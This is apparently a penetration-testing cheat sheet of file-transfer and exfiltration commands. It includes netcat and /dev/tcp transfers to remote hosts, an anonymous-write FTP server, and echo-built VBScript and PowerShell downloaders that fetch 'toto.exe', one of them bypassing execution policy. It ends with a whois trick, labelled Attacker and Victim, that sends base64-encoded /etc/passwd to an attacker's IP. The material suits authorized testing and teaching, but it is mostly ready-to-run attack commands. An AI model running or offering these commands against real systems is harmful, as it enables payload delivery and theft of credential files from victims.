File Transfer

netcat

nc -lvp 4444 < c:\windows\notepad.exe
nc -nv 172.16.237.158 4444 > notepad.exe
cat myFile.tgz >/dev/tcp/x.x.x.x/9001
nc -lnvp 9001 >myFile.tgz

FTP

Linux Server

pip install pyftpdlib

# Run (-w flag = anonymous write access)
python -m pyftpdlib -p 21 -w

Windows Client

echo open 172.16.237.245 21> ftp.txt
echo USER anonymous>> ftp.txt
echo thesecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET toto.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

HTTP

Python Server

python -m SimpleHTTPServer 80   # Python 2 only; the Python 3 equivalent is http.server (next line)
python3 -m http.server 8000

PHP

php -S 0.0.0.0:8000

Ruby

ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"

Windows Client - VBScript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://172.16.237.245/toto.exe toto.exe

Windows Client - PowerShell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://172.16.237.245/toto.exe" >>wget.ps1
echo $file = "toto.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Data Exfiltration

Whois

Attacker

nc -l -v -p 43 | sed "s/ //g" | base64 -d

Victim

whois -h $attackerIP -p 43 `cat /etc/passwd | base64`